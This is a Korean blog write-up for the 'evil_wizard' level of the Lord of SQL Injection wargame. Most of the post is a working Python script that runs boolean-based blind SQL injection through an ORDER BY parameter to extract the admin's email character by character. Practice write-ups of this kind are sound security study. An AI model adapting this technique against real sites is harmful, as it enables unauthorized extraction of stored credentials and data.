티스토리 뷰

writeup/LOS

[Lord of SQL injection] evil_wizard

hoppi 2021. 7. 29. 15:10

59번째 글.

 

 

1. 코드 분석

hell_fire 문제와 차이점은 sleep()과 benchmark()를 사용할 수 없다는 점이었다.

 

 

2. Exploit

hell_fire 문제에서도 sleep()과 benchmark()를 이용하지 않았기 때문에

사용했던 코드에서 조금만 바꿔줘도 문제가 풀린다.

 

 

import requests
import string
sess = requests.session()
headers = {'Cookie': 'PHPSESSID=YOURSESSID'}
admin_password = ''
ascii_printable = string.printable
#print(ascii_printable)

## get password length
for i in range(100):
    url = f"https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)={i},id='rubiya'"
    res = sess.get(url, headers=headers)
    if('<th>id</th><th>email</th><th>score</th><tr><td>rubiya<' in res.text):
        print('Password length is ', i)
        password_length = i
        break

## get password
for i in range(1,password_length+1):
    for j in ascii_printable:
        url = f"https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(substr(email,{i},1))={ord(j)},id='rubiya'"
        res = sess.get(url, headers=headers)
        if('<th>id</th><th>email</th><th>score</th><tr><td>rubiya<' in res.text):
            admin_password = admin_password+j
            print(admin_password)
            break





print("Admin Password is " + admin_password)

 

'writeup > LOS' 카테고리의 다른 글

[Lord of SQL injection] red_dragon  (0) 2021.08.05
[Lord of SQL injection] green_dragon  (0) 2021.08.02
[Lord of SQL injection] hell_fire  (0) 2021.07.27
[Lord of SQL injection] dark_eyes  (0) 2021.07.26
[Lord of SQL injection] iron_golem  (0) 2021.07.23